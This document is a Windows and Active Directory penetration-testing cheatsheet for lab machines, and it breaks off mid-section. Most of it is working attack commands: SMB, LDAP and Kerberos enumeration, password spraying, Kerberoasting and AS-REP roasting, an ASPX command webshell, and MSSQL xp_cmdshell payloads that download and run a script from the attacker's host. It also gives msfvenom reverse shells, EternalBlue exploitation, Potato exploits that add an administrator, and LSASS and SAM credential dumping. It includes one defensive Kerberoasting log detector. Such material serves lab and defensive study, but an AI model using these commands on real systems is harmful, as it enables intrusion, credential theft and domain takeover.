Windows & Active Directory Methodology

📋 TABLE OF CONTENTS
  1. Environment Setup
  2. Phase 1 — Reconnaissance & Port Scanning
  3. Phase 2 — Windows Service Enumeration
  4. Phase 3 — Active Directory Enumeration
  5. Phase 4 — Web Application Attacks
  6. Phase 5 — Initial Access & Exploitation
  7. Phase 6 — Post-Exploitation & Situational Awareness
  8. Phase 7 — Windows Privilege Escalation
  9. Phase 8 — Active Directory Attacks
  10. Phase 9 — Lateral Movement
  11. Phase 10 — Domain Compromise & DCSync
  12. Phase 11 — Credential Dumping & Loot
  13. File Transfer Techniques
  14. Shells & Listeners
  15. Wordlists & Resources

🛠️ Environment Setup
```bash
# Set your variables — use everywhere
export IP=10.10.11.XXX
export LHOST=10.10.14.XXX   # your tun0 IP
export LPORT=4444
export DOMAIN=domain.htb
export DC=dc.domain.htb

# Add to /etc/hosts (needs root, hence tee)
echo "$IP $DOMAIN $DC" | sudo tee -a /etc/hosts

# Working directory
mkdir -p ~/htb/machinename/{nmap,smb,ldap,web,loot,exploits,bloodhound}
cd ~/htb/machinename

# Install/verify key tools
which crackmapexec impacket-secretsdump bloodhound-python evil-winrm
```

Phase 1 — Reconnaissance & Port Scanning

1.1 Nmap

```bash
# Fast full port scan first
nmap -p- --min-rate=5000 -T4 $IP -oN nmap/all_ports.txt

# Service/version/script scan on found ports (-O needs root)
sudo nmap -p 53,80,88,135,139,389,443,445,464,593,636,3268,3389,5985 -sC -sV -O $IP -oN nmap/targeted.txt

# UDP — important for AD (Kerberos, DNS, SNMP)
sudo nmap -sU --top-ports 100 $IP -oN nmap/udp.txt

# Windows-specific scripts
nmap --script smb-security-mode,smb-os-discovery,smb2-security-mode -p 445 $IP
nmap --script ldap-rootdse -p 389 $IP
nmap --script msrpc-enum -p 135 $IP
```

1.2 Common Windows / AD Ports

| Port | Service | Notes |
|---|---|---|
| 53 | DNS | Zone transfers, domain name |
| 80/443 | HTTP/HTTPS | Web apps, admin panels |
| 88 | Kerberos | AS-REP roasting, brute force |
| 135 | RPC | MSRPC endpoint mapper |
| 139/445 | SMB | File shares, relay attacks |
| 389/636 | LDAP/LDAPS | AD enumeration |
| 464 | Kpasswd | Kerberos password change |
| 593 | HTTP RPC | RPC over HTTP |
| 3268/3269 | Global Catalog | LDAP across domains |
| 3389 | RDP | Remote Desktop |
| 5985/5986 | WinRM | Evil-WinRM / PS remoting |
| 1433 | MSSQL | SQL Server |
| 5432 | PostgreSQL | Less common on Windows |
| 8080 | HTTP alt | Admin / dev panels |

Phase 2 — Windows Service Enumeration

2.1 SMB Enumeration

```bash
# Null session enumeration
smbclient -L //$IP -N
smbclient //$IP/share_name -N

# CrackMapExec (most useful tool for SMB)
crackmapexec smb $IP
crackmapexec smb $IP -u '' -p '' --shares
crackmapexec smb $IP -u 'guest' -p '' --shares
crackmapexec smb $IP -u 'guest' -p '' --rid-brute
crackmapexec smb $IP -u user -p 'pass' --shares
crackmapexec smb $IP -u user -p 'pass' --users
crackmapexec smb $IP -u user -p 'pass' --groups
crackmapexec smb $IP -u user -p 'pass' --sessions
crackmapexec smb $IP -u user -p 'pass' --loggedon-users
crackmapexec smb $IP -u user -p 'pass' --pass-pol

# Enum4linux-ng
enum4linux-ng -A $IP
enum4linux-ng -A -u user -p pass $IP

# smbmap — list and check permissions
smbmap -H $IP
smbmap -H $IP -u '' -p ''
smbmap -H $IP -u user -p 'pass'
smbmap -H $IP -u user -p 'pass' -R            # recursive
smbmap -H $IP -u user -p 'pass' -R share      # recursive on specific share
smbmap -H $IP -u user -p 'pass' --download 'share\file.txt'

# Connect to share interactively
smbclient //$IP/share -U user%pass
smbclient //$IP/share -U 'domain\user%pass'

# smbclient commands (at the smb: \> prompt)
smb> ls
smb> get file.txt
smb> put local.txt
smb> recurse on
smb> prompt off
smb> mget *

# Download all files from share
smbget -R smb://$IP/share -U user%pass

# Mount share (needs root and cifs-utils)
sudo mount -t cifs //$IP/share /mnt/smb -o username=user,password=pass,domain=domain.htb

# Nmap SMB vuln check (quote the glob so the shell does not expand it)
nmap --script 'smb-vuln*' -p 445 $IP
nmap --script smb-enum-shares,smb-enum-users,smb-enum-groups,smb-os-discovery -p 445 $IP
```

2.2 RPC Enumeration

```bash
# rpcclient
rpcclient -U "" -N $IP
rpcclient -U "user%pass" $IP

# Inside rpcclient:
enumdomusers                 # list users
enumdomgroups                # list groups
enumalsgroups domain         # alias groups
querydominfo                 # domain info
queryuser 0x1f4              # query user by RID
querygroupmem 0x200          # members of group
lookupnames admin            # SID lookup
lookupsids S-1-5-21-...      # reverse SID lookup
getdompwinfo                 # password policy
srvinfo                      # server info
netshareenumall              # all shares

# Impacket — RPC dump
impacket-rpcdump $IP
impacket-rpcdump $IP -p 593   # HTTP RPC
```

2.3 RDP (Port 3389)

```bash
# Check if RDP is open / get info
nmap --script rdp-enum-encryption,rdp-vuln-ms12-020 -p 3389 $IP

# Connect
xfreerdp /v:$IP /u:user /p:'password'
xfreerdp /v:$IP /u:user /p:'password' /d:domain.htb
xfreerdp /v:$IP /u:user /p:'password' /d:domain.htb /cert:ignore +clipboard
xfreerdp /v:$IP /u:user /pth:NTLM_HASH /d:domain.htb /cert:ignore   # pass-the-hash

# Remmina GUI
remmina

# Brute force RDP
hydra -l admin -P /usr/share/wordlists/rockyou.txt rdp://$IP -t 4
crowbar -b rdp -s $IP/32 -u user -C /usr/share/wordlists/rockyou.txt
```

2.4 WinRM (Port 5985/5986)

```bash
# Check WinRM
crackmapexec winrm $IP -u user -p 'pass'
crackmapexec winrm $IP -u user -H NTLM_HASH

# Evil-WinRM (best WinRM client)
evil-winrm -i $IP -u user -p 'password'
evil-winrm -i $IP -u user -H NTLM_HASH
evil-winrm -i $IP -u user -p 'password' -S   # SSL (port 5986)

# Inside Evil-WinRM
upload /local/file.exe C:\Windows\Temp\file.exe
download C:\Users\user\Desktop\file.txt ./file.txt
menu   # see built-in commands

# PowerShell Remoting (from Windows)
Enter-PSSession -ComputerName $IP -Credential (Get-Credential)
Invoke-Command -ComputerName $IP -Credential (Get-Credential) -ScriptBlock { whoami }
```

2.5 DNS Enumeration

```bash
# Zone transfer
dig axfr @$IP $DOMAIN
host -l $DOMAIN $IP
dnsrecon -d $DOMAIN -t axfr

# Brute force subdomains
gobuster dns -d $DOMAIN -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-20000.txt -r $IP -t 30
ffuf -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-20000.txt -u http://$DOMAIN -H "Host: FUZZ.$DOMAIN" -fs [size]

# DNSRecon
dnsrecon -d $DOMAIN -n $IP
dnsrecon -d $DOMAIN -t brt -D /usr/share/seclists/Discovery/DNS/subdomains-top1million-20000.txt

# Nslookup (interactive)
nslookup
> server $IP
> $DOMAIN
> set type=MX
> $DOMAIN
```

2.6 MSSQL (Port 1433)

```bash
# Enumerate
nmap --script ms-sql-info,ms-sql-config,ms-sql-empty-password -p 1433 $IP

# Connect with Impacket
impacket-mssqlclient user:password@$IP
impacket-mssqlclient user:password@$IP -windows-auth

# Connect with CrackMapExec
crackmapexec mssql $IP -u user -p 'pass'
crackmapexec mssql $IP -u user -p 'pass' -q "SELECT @@version"

# Inside MSSQL CLI (impacket-mssqlclient)
SQL> SELECT @@version;
SQL> SELECT DB_NAME();
SQL> SELECT name FROM sys.databases;
SQL> USE database;
SQL> SELECT table_name FROM information_schema.tables;
SQL> SELECT name FROM sys.syslogins;

# Enable xp_cmdshell
SQL> EXEC sp_configure 'show advanced options', 1; RECONFIGURE;
SQL> EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE;
SQL> EXEC xp_cmdshell 'whoami';
SQL> EXEC xp_cmdshell 'powershell -c "IEX(New-Object Net.WebClient).DownloadString(''http://IP/shell.ps1'')"';

# NTLM capture via MSSQL (responder + xp_dirtree)
SQL> EXEC xp_dirtree '\\LHOST\share';          -- triggers NTLM auth
SQL> EXEC xp_fileexist '\\LHOST\share\file';

# Read/write files
SQL> SELECT * FROM OPENROWSET(BULK 'C:\Windows\win.ini', SINGLE_CLOB) AS x;

# Linked servers
SQL> SELECT * FROM sys.servers;
SQL> EXEC ('SELECT @@version') AT [linkedserver];
SQL> EXEC ('xp_cmdshell ''whoami''') AT [linkedserver];
```

Phase 3 — Active Directory Enumeration

3.1 LDAP Enumeration

```bash
# Anonymous / guest LDAP
ldapsearch -x -H ldap://$IP -b "DC=domain,DC=htb"
ldapsearch -x -H ldap://$IP -b "" -s base namingContexts

# Authenticated
ldapsearch -x -H ldap://$IP -D "user@domain.htb" -w 'password' -b "DC=domain,DC=htb"
ldapsearch -x -H ldap://$IP -D "user@domain.htb" -w 'password' -b "DC=domain,DC=htb" "(objectClass=user)" sAMAccountName
ldapsearch -x -H ldap://$IP -D "user@domain.htb" -w 'password' -b "DC=domain,DC=htb" "(objectClass=group)"
ldapsearch -x -H ldap://$IP -D "user@domain.htb" -w 'password' -b "DC=domain,DC=htb" "(objectClass=computer)"

# Find Domain Admins
ldapsearch -x -H ldap://$IP -D "user@domain.htb" -w 'password' -b "DC=domain,DC=htb" "(memberOf=CN=Domain Admins,CN=Users,DC=domain,DC=htb)"

# Enumerate with windapsearch
windapsearch -m users --dc $IP
windapsearch -m groups --dc $IP
windapsearch -m domain-admins --dc $IP
windapsearch -m computers --dc $IP
windapsearch -m custom --filter "(objectClass=user)" -A sAMAccountName,description --dc $IP

# ldapdomaindump (HTML output)
ldapdomaindump $IP -u 'domain.htb\user' -p 'password' -o ldap/
```

3.2 BloodHound Enumeration

```bash
# Python BloodHound collector (run from Kali)
pip3 install bloodhound
bloodhound-python -u user -p 'password' -d domain.htb -ns $IP -c All --zip
bloodhound-python -u user -p '' -d domain.htb -ns $IP -c All --zip          # guest
bloodhound-python -u user --hashes :NTLM_HASH -d domain.htb -ns $IP -c All --zip

# SharpHound (run from Windows victim)
.\SharpHound.exe -c All --zipfilename loot.zip
.\SharpHound.exe -c All,GPOLocalGroup --zipfilename loot.zip
powershell -exec bypass -c "IEX(New-Object Net.WebClient).DownloadString('http://IP/SharpHound.ps1'); Invoke-BloodHound -c All -OutputDirectory C:\Temp"

# Start BloodHound
sudo neo4j start
bloodhound &
# Login: neo4j:neo4j (change on first run)
# Upload zip file, then use queries

# Key BloodHound queries:
#   Find all Domain Admins
#   Find shortest path to Domain Admin
#   Find principals with DCSync rights
#   Find computers where Domain Users can RDP
#   Find AS-REP Roastable users
#   Find Kerberoastable users
#   Find users with constrained delegation
#   Find computers with unconstrained delegation
```

3.3 User Enumeration

```bash
# Kerbrute — username enum against Kerberos (no auth needed)
kerbrute userenum -d domain.htb --dc $IP /usr/share/seclists/Usernames/xato-net-10-million-usernames.txt
kerbrute userenum -d domain.htb --dc $IP users.txt -t 50

# CrackMapExec — RID brute (null or guest)
crackmapexec smb $IP -u '' -p '' --rid-brute
crackmapexec smb $IP -u 'guest' -p '' --rid-brute

# Impacket lookupsid
impacket-lookupsid guest@$IP -no-pass
impacket-lookupsid guest@$IP -no-pass | grep "SidTypeUser"
impacket-lookupsid domain.htb/user:pass@$IP

# SMB user enum
enum4linux-ng -U $IP
rpcclient -U "" -N $IP -c "enumdomusers"

# Extract usernames from the ldapdomaindump JSON
# (attribute values are lists in that format, hence the [0])
python3 -c "import sys,json; [print(u['attributes']['sAMAccountName'][0]) for u in json.load(sys.stdin) if u.get('attributes',{}).get('sAMAccountName')]" < ldap/domain_users.json > users.txt
```

Phase 4 — Web Application Attacks
See the Linux Cheatsheet for full web attack coverage. Windows-specific additions below.

4.1 IIS-Specific Enumeration

```bash
# IIS version detection
nmap --script http-iis-webdav-vuln,http-iis-short-name-brute -p 80,443 $IP
curl -I http://$IP   # look for Server: Microsoft-IIS/X.X

# Common IIS paths
http://$IP/iisstart.htm
http://$IP/_vti_bin/
http://$IP/aspnet_client/
http://$IP/Trace.axd
http://$IP/elmah.axd
http://$IP/web.config   # try to read (403 = exists)
http://$IP/.git/        # git repo leak
http://$IP/backup.zip

# WebDAV check
davtest -url http://$IP
cadaver http://$IP

# WebDAV upload .aspx shell
davtest -url http://$IP -uploadfile shell.aspx -uploadloc shell.aspx
curl -X PUT http://$IP/shell.aspx -d @shell.aspx

# Short name brute force (IIS 8.3 filename leak)
java -jar iis_shortname_scanner.jar 2 20 http://$IP/
```

4.2 ASP/ASPX Webshells

```aspx
<!-- simple cmd webshell -->
<%@ Page Language="C#" %>
<%@ Import Namespace="System.Diagnostics" %>
<%
    string cmd = Request.QueryString["cmd"];
    Process p = new Process();
    p.StartInfo.FileName = "cmd.exe";
    p.StartInfo.Arguments = "/c " + cmd;
    p.StartInfo.UseShellExecute = false;
    p.StartInfo.RedirectStandardOutput = true;
    p.Start();
    Response.Write("<pre>" + p.StandardOutput.ReadToEnd() + "</pre>");
%>
```

```php
<!-- PHP on IIS -->
<?php system($_GET['cmd']); ?>
```

4.3 SQL Injection on Windows / MSSQL

```bash
# MSSQL error-based SQLi detection
' ; SELECT @@version --
'; EXEC xp_cmdshell('whoami') --
'; EXEC master.dbo.xp_cmdshell 'ping $LHOST' --

# Enable xp_cmdshell via SQLi
'; EXEC sp_configure 'show advanced options',1; RECONFIGURE; EXEC sp_configure 'xp_cmdshell',1; RECONFIGURE --
'; EXEC xp_cmdshell 'powershell -c IEX(New-Object Net.WebClient).DownloadString(\"http://$LHOST/shell.ps1\")' --

# SQLMap with MSSQL
sqlmap -u "http://$IP/page?id=1" --dbms=mssql --os-shell
sqlmap -u "http://$IP/page?id=1" --dbms=mssql --technique=E --dbs
```

Phase 5 — Initial Access & Exploitation

5.1 Password Spraying

```bash
# CrackMapExec — SMB
crackmapexec smb $IP -u users.txt -p 'Password123' --continue-on-success
crackmapexec smb $IP -u users.txt -p passwords.txt --continue-on-success
crackmapexec smb $IP -u users.txt -p 'Password123' -d domain.htb

# CrackMapExec — WinRM
crackmapexec winrm $IP -u users.txt -p 'Password123' --continue-on-success

# Kerbrute — password spray (safer, no lockout if careful)
kerbrute passwordspray -d domain.htb --dc $IP users.txt 'Password123'

# Hydra — WinRM
hydra -L users.txt -p 'Password123' $IP http-post-form "/wsman:..."

# Rule: Stay under lockout threshold (typically 5 bad attempts)
# Check password policy first!
crackmapexec smb $IP -u '' -p '' --pass-pol
```

5.2 AS-REP Roasting (No Pre-Auth Required)

```bash
# Get AS-REP hash (no creds needed if user has "Do not require Kerberos preauthentication")
impacket-GetNPUsers domain.htb/ -dc-ip $IP -no-pass -usersfile users.txt
impacket-GetNPUsers domain.htb/ -dc-ip $IP -no-pass -request
impacket-GetNPUsers domain.htb/user:pass -dc-ip $IP -request   # with auth (gets all)

# Crack the hash
hashcat -m 18200 asrep_hashes.txt /usr/share/wordlists/rockyou.txt
john asrep_hashes.txt --wordlist=/usr/share/wordlists/rockyou.txt

# Hash format example:
# $krb5asrep$23$user@DOMAIN.HTB:...
```

5.3 Kerberoasting

```bash
# Get TGS hashes for service accounts (need valid credentials)
impacket-GetUserSPNs domain.htb/user:pass -dc-ip $IP -request
impacket-GetUserSPNs domain.htb/user:pass -dc-ip $IP -request -outputfile kerberoast.txt
impacket-GetUserSPNs domain.htb/user -hashes :NTLM_HASH -dc-ip $IP -request

# From Windows (Rubeus)
.\Rubeus.exe kerberoast /outfile:hashes.txt
.\Rubeus.exe kerberoast /user:svc_account /outfile:hashes.txt

# From Windows (PowerView)
Get-DomainUser -SPN | Get-DomainSPNTicket -Format Hashcat | Export-Csv hashes.csv

# Crack
hashcat -m 13100 kerberoast.txt /usr/share/wordlists/rockyou.txt
john kerberoast.txt --wordlist=/usr/share/wordlists/rockyou.txt

# Hash format example:
# $krb5tgs$23$*user$DOMAIN.HTB$domain.htb/user*$...
```
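Both roasting techniques in 5.2 and 5.3 leave a distinctive trace on the domain controller: a 4768 issued with Pre-Authentication Type 0 (AS-REP roasting) and a burst of 4769 service-ticket requests with RC4 encryption (0x17) for user accounts (Kerberoasting, the `$krb5tgs$23$` format above). The following detector is an added example, not part of the cheatsheet; it runs over constructed key=value event lines that use the field names of the real 4768/4769 events.

```python
"""Flag Kerberoasting / AS-REP roasting indicators in DC Security-log events.

Added example (not from the original cheatsheet). Events are modelled as one
'key=value ...' line each, using the field names Windows writes in 4768/4769.
"""
from collections import defaultdict

# Constructed sample events (not real logs). 0x17 = RC4-HMAC, 0x12 = AES256-CTS.
SAMPLE_EVENTS = """\
EventID=4768 TargetUserName=alice ServiceName=krbtgt TicketEncryptionType=0x12 PreAuthType=2 IpAddress=10.10.11.5
EventID=4768 TargetUserName=svc_backup ServiceName=krbtgt TicketEncryptionType=0x17 PreAuthType=0 IpAddress=10.10.14.7
EventID=4769 TargetUserName=bob@DOMAIN.HTB ServiceName=WS01$ TicketEncryptionType=0x12 TicketOptions=0x40810000 IpAddress=10.10.11.20
EventID=4769 TargetUserName=bob@DOMAIN.HTB ServiceName=svc_sql TicketEncryptionType=0x17 TicketOptions=0x40810000 IpAddress=10.10.14.7
EventID=4769 TargetUserName=bob@DOMAIN.HTB ServiceName=svc_web TicketEncryptionType=0x17 TicketOptions=0x40810000 IpAddress=10.10.14.7
EventID=4769 TargetUserName=bob@DOMAIN.HTB ServiceName=svc_iis TicketEncryptionType=0x17 TicketOptions=0x40810000 IpAddress=10.10.14.7
EventID=4769 TargetUserName=carol@DOMAIN.HTB ServiceName=svc_sql TicketEncryptionType=0x17 TicketOptions=0x40810000 IpAddress=10.10.11.30
"""

RC4_HMAC = 0x17


def parse_event(line):
    """Turn one 'key=value key=value' line into a dict; numeric fields become ints."""
    fields = dict(token.split("=", 1) for token in line.split())
    for key in ("TicketEncryptionType", "TicketOptions", "PreAuthType"):
        if key in fields:
            fields[key] = int(fields[key], 0)   # base 0 accepts both '0x17' and '2'
    fields["EventID"] = int(fields["EventID"])
    return fields


def is_asrep_roast_indicator(ev):
    """4768 with Pre-Authentication Type 0: the account has pre-auth disabled, so
    anyone can obtain an AS-REP encrypted under its key and crack it offline."""
    return ev["EventID"] == 4768 and ev.get("PreAuthType") == 0


def is_kerberoast_indicator(ev):
    """4769 for a user service account (not a machine account, not krbtgt) where the
    client asked for an RC4 ticket: the ticket type hashcat mode 13100 cracks."""
    if ev["EventID"] != 4769:
        return False
    svc = ev.get("ServiceName", "")
    if svc.endswith("$") or svc.lower() == "krbtgt":
        return False
    return ev.get("TicketEncryptionType") == RC4_HMAC


def analyse(log_text, burst_threshold=3):
    """Return (asrep_accounts, kerberoast_hits, bursting_ips).

    bursting_ips are client IPs that requested RC4 tickets for at least
    burst_threshold distinct service accounts, the pattern a bulk
    'request every SPN' run leaves behind."""
    asrep_accounts, kerberoast_hits = [], []
    rc4_services_by_ip = defaultdict(set)
    for line in log_text.splitlines():
        if not line.strip():
            continue
        ev = parse_event(line)
        if is_asrep_roast_indicator(ev):
            asrep_accounts.append(ev["TargetUserName"])
        if is_kerberoast_indicator(ev):
            kerberoast_hits.append((ev["IpAddress"], ev["TargetUserName"], ev["ServiceName"]))
            rc4_services_by_ip[ev["IpAddress"]].add(ev["ServiceName"])
    bursting_ips = sorted(ip for ip, svcs in rc4_services_by_ip.items()
                          if len(svcs) >= burst_threshold)
    return asrep_accounts, kerberoast_hits, bursting_ips


if __name__ == "__main__":
    asrep, roast, bursts = analyse(SAMPLE_EVENTS)
    print("Accounts issued a TGT without pre-auth:", asrep)
    print("RC4 service-ticket requests for user accounts:", roast)
    print("Clients bursting RC4 TGS requests:", bursts)
```

The corresponding hardening is the mirror image of the checks: remove "Do not require Kerberos preauthentication" from every account and set `msDS-SupportedEncryptionTypes` on service accounts to AES only, so neither indicator can fire.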

5.4 Searchsploit & CVEs

```bash
# Search for Windows/service exploits
searchsploit windows 10
searchsploit IIS 10
searchsploit "exchange server"
searchsploit "windows server 2019"

# Common high-value Windows CVEs to check:
#   EternalBlue     MS17-010 (SMB — Windows 7/2008)
#   BlueKeep        CVE-2019-0708 (RDP — pre-auth RCE)
#   PrintNightmare  CVE-2021-1675 / CVE-2021-34527
#   ProxyLogon      CVE-2021-26855 (Exchange)
#   ProxyShell      CVE-2021-34473 (Exchange)
#   Log4Shell       CVE-2021-44228
#   Zerologon       CVE-2020-1472 (Netlogon)
#   PetitPotam      CVE-2021-36942 (NTLM coerce)

# EternalBlue check
nmap --script smb-vuln-ms17-010 -p 445 $IP
python3 checker.py $IP   # from github PoC

# AutoBlue / MS17-010 exploit
git clone https://github.com/3ndG4me/AutoBlue-MS17-010
cd AutoBlue-MS17-010
python eternal_checker.py $IP
./shell_prep.sh   # generate shellcode
python eternalblue_exploit7.py $IP shellcode/sc_x64.bin
```

5.5 MSFVenom Payloads (Windows)

```bash
# Windows x64 EXE
msfvenom -p windows/x64/shell_reverse_tcp LHOST=$LHOST LPORT=$LPORT -f exe -o shell.exe
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=$LHOST LPORT=$LPORT -f exe -o meter.exe

# Windows x86 EXE
msfvenom -p windows/shell_reverse_tcp LHOST=$LHOST LPORT=$LPORT -f exe -o shell32.exe

# DLL
msfvenom -p windows/x64/shell_reverse_tcp LHOST=$LHOST LPORT=$LPORT -f dll -o shell.dll

# PowerShell
msfvenom -p windows/x64/shell_reverse_tcp LHOST=$LHOST LPORT=$LPORT -f ps1 -o shell.ps1

# HTA
msfvenom -p windows/x64/shell_reverse_tcp LHOST=$LHOST LPORT=$LPORT -f hta-psh -o shell.hta

# ASPX webshell
msfvenom -p windows/x64/shell_reverse_tcp LHOST=$LHOST LPORT=$LPORT -f aspx -o shell.aspx

# Encoded (basic AV evasion)
msfvenom -p windows/x64/shell_reverse_tcp LHOST=$LHOST LPORT=$LPORT -e x64/xor_dynamic -i 10 -f exe -o encoded.exe

# Staged vs stageless
#   Staged:    smaller, connects back for payload (windows/x64/meterpreter/reverse_tcp)
#   Stageless: self-contained                     (windows/x64/meterpreter_reverse_tcp)
```

Phase 6 — Post-Exploitation & Situational Awareness

6.1 Basic Windows Enumeration

```cmd
:: Who am I
whoami
whoami /priv
whoami /groups
whoami /all

:: System info
systeminfo
hostname
echo %COMPUTERNAME%
echo %USERDOMAIN%
wmic os get Caption,BuildNumber,ServicePackMajorVersion

:: Network
ipconfig /all
netstat -ano
route print
arp -a
nslookup %USERDOMAIN%

:: Users and groups
net user
net user username
net localgroup
net localgroup Administrators
net group /domain
net group "Domain Admins" /domain
net accounts /domain

:: Processes and services
tasklist /v
wmic process list full
sc query
sc query type= all state= all
:: PowerShell equivalent: Get-Service

:: Installed software
wmic product get Name,Version
reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall

:: Environment
set
echo %PATH%
echo %APPDATA%
echo %TEMP%
```

6.2 PowerShell Enumeration

```powershell
# System info
$PSVersionTable
[System.Environment]::OSVersion
Get-WmiObject Win32_OperatingSystem | Select-Object Caption, BuildNumber, ServicePackMajorVersion

# Current user
[System.Security.Principal.WindowsIdentity]::GetCurrent()
[Security.Principal.WindowsPrincipal][Security.Principal.WindowsIdentity]::GetCurrent()

# Network
Get-NetIPAddress
Get-NetRoute
Get-NetTCPConnection -State Listen
Get-DnsClientServerAddress

# Users
Get-LocalUser
Get-LocalGroup
Get-LocalGroupMember Administrators

# AD (if RSAT available)
Get-ADUser -Filter * -Properties *
Get-ADGroup -Filter * | Select-Object Name
Get-ADGroupMember "Domain Admins"
Get-ADComputer -Filter * | Select-Object Name
Get-ADDomainController
(Get-ADDomain).DomainMode

# Processes
Get-Process | Sort-Object CPU -Descending | Select-Object -First 20
Get-WmiObject Win32_Process | Select-Object Name, ProcessId, ParentProcessId, CommandLine

# Services
Get-Service | Where-Object { $_.Status -eq "Running" }
Get-WmiObject Win32_Service | Select-Object Name, StartName, PathName, StartMode | Where-Object { $_.StartName -ne "LocalSystem" }

# Scheduled tasks
Get-ScheduledTask | Where-Object { $_.TaskPath -notlike "\Microsoft*" }
schtasks /query /fo LIST /v

# AppLocker
Get-AppLockerPolicy -Effective -Xml

# PowerShell history
Get-History
cat (Get-PSReadlineOption).HistorySavePath

# Bypass execution policy (no admin needed)
powershell -ep bypass
powershell -ExecutionPolicy Bypass -File script.ps1
Set-ExecutionPolicy -ExecutionPolicy Bypass -Scope CurrentUser -Force
```

6.3 Finding Credentials

```cmd
:: Credentials in registry
reg query HKLM /f password /t REG_SZ /s
reg query HKCU /f password /t REG_SZ /s
reg query "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon"
reg query "HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon"
reg query "HKLM\SYSTEM\CurrentControlSet\Services\SNMP" /s
reg query "HKCU\Software\SimonTatham\PuTTY\Sessions" /s

:: Unattend / sysprep files
type C:\Windows\Panther\Unattend.xml
type C:\Windows\Panther\Unattend\Unattend.xml
type C:\Windows\System32\sysprep\sysprep.xml
type C:\Windows\System32\sysprep\unattend.xml

:: IIS config
type C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Config\web.config
type C:\inetpub\wwwroot\web.config
findstr /si password C:\inetpub\*.config

:: MSSQL connection strings
findstr /si connectionstring C:\inetpub\

:: PowerShell history
type %APPDATA%\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt
type C:\Users\*\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt

:: Search for credentials in files
findstr /spin "password" *.txt *.xml *.ini *.config 2>nul
dir /s /b *pass* *cred* *secret* *config* 2>nul

:: .kdbx (KeePass) databases
dir /s /b *.kdbx 2>nul

:: SSH keys
dir /s /b id_rsa id_rsa.pub *.ppk 2>nul

:: VNC passwords (encrypted)
reg query "HKCU\Software\ORL\WinVNC3\Password"
reg query "HKCU\Software\TightVNC\Server"
```

Phase 7 — Windows Privilege Escalation

7.1 Automated Enumeration

```powershell
# WinPEAS (best)
.\winPEAS.exe
.\winPEAS.exe quiet
.\winPEAS.exe systeminfo userinfo
.\winPEAS.exe log   # save to file

# PowerUp (PowerShell)
IEX(New-Object Net.WebClient).DownloadString('http://$LHOST/PowerUp.ps1')
Invoke-AllChecks | Out-File -Encoding ASCII checks.txt

# Seatbelt (comprehensive)
.\Seatbelt.exe -group=all
.\Seatbelt.exe -group=user
.\Seatbelt.exe NTLMSettings OSInfo PoweredOnEvents

# Watson (missing patches)
.\Watson.exe

# Sherlock (older, patches)
IEX(New-Object Net.WebClient).DownloadString('http://$LHOST/Sherlock.ps1')
Find-AllVulns
```

7.2 Token & Privilege Abuse

```cmd
:: Check privileges
whoami /priv

:: KEY PRIVILEGES TO LOOK FOR:
::   SeImpersonatePrivilege   → Potato attacks
::   SeAssignPrimaryToken     → Potato attacks
::   SeTakeOwnershipPrivilege → Take ownership of files/registry
::   SeDebugPrivilege         → Dump process memory (LSASS)
::   SeBackupPrivilege        → Read any file
::   SeRestorePrivilege       → Write any file
::   SeLoadDriverPrivilege    → Load kernel drivers (Capcom, etc.)
::   SeTcbPrivilege           → Act as OS (create tokens)
::   SeCreateTokenPrivilege   → Create arbitrary tokens
```

```powershell
# Potato attacks (SeImpersonatePrivilege / SeAssignPrimaryTokenPrivilege)
# These work from IIS, SQL Server service accounts, etc.

# JuicyPotato (Windows Server 2016 and earlier)
.\JuicyPotato.exe -l 1337 -p cmd.exe -a "/c net user hacker Password123! /add && net localgroup administrators hacker /add" -t *
.\JuicyPotato.exe -l 1337 -p cmd.exe -a "/c C:\Temp\shell.exe" -t * -c {CLSID}

# RoguePotato (newer systems)
.\RoguePotato.exe -r $LHOST -e "C:\Temp\shell.exe" -l 9999

# SweetPotato (all-in-one)
.\SweetPotato.exe -a "C:\Temp\shell.exe"
.\SweetPotato.exe -p C:\Windows\System32\cmd.exe -a "/c net user hacker Password123! /add"

# GodPotato (Windows 2012 - 2022, works everywhere)
.\GodPotato.exe -cmd "cmd /c whoami"
.\GodPotato.exe -cmd "cmd /c C:\Temp\shell.exe"

# PrintSpoofer (Windows 10 / Server 2016+)
.\PrintSpoofer.exe -i -c cmd
.\PrintSpoofer.exe -c "C:\Temp\shell.exe"

# SeBackupPrivilege → dump SAM
mkdir C:\Temp\loot
reg save hklm\sam C:\Temp\loot\SAM
reg save hklm\system C:\Temp\loot\SYSTEM
reg save hklm\security C:\Temp\loot\SECURITY
# Transfer files, then on Kali:
#   impacket-secretsdump -sam SAM -system SYSTEM -security SECURITY LOCAL

# SeDebugPrivilege → LSASS dump
.\procdump.exe -ma lsass.exe lsass.dmp
# Or:
tasklist | findstr lsass   # find PID
.\mimikatz.exe "sekurlsa::minidump lsass.dmp" "sekurlsa::logonpasswords" exit
```

7.3 Unquoted Service Paths

```cmd
:: Find unquoted service paths
wmic service get Name,PathName,StartMode | findstr /i "auto" | findstr /v "C:\Windows\\"

:: PowerShell
Get-WmiObject Win32_Service | Where-Object {$_.PathName -notmatch '"' -and $_.PathName -notmatch "C:\\Windows"} | Select-Object Name, PathName, StartName, StartMode

:: PowerUp
Get-UnquotedService

:: Example exploit:
::   PathName:      C:\Program Files\Vulnerable Service\service.exe
::   Windows tries: C:\Program.exe, C:\Program Files\Vulnerable.exe, C:\Program Files\Vulnerable Service\service.exe
::   Place malicious: C:\Program Files\Vulnerable.exe
msfvenom -p windows/x64/shell_reverse_tcp LHOST=$LHOST LPORT=$LPORT -f exe -o "Vulnerable.exe"
copy Vulnerable.exe "C:\Program Files\Vulnerable.exe"
sc stop VulnerableService
sc start VulnerableService
:: Or wait for reboot
```

7.4 Weak Service Permissions

```cmd
:: Check service permissions
accesschk.exe /accepteula -uwcqv "Authenticated Users" *
accesschk.exe /accepteula -uwcqv user *
accesschk.exe /accepteula -ucqv VulnerableService

:: PowerShell
Get-Acl HKLM:\System\CurrentControlSet\Services\VulnerableService | Format-List

:: If you have WRITE permission to a service binary:
